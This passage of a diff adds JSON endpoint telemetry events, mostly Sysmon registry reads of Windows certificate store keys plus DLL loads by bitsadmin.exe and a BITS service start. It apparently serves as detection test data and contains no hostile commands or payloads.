"timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876520000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876520000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876520000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876520000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876520000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876520000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876520000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570876520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876520000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876680000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "c:\\windows\\system32\\svchost.exe -k netsvcs -p -s BITS", + "event_type": "process", + "logon_id": 999, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 3980, + "ppid": 568, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "subtype": "create", + "timestamp": 131883570876860016, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}", + "unique_ppid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570876680000, + "unique_pid": 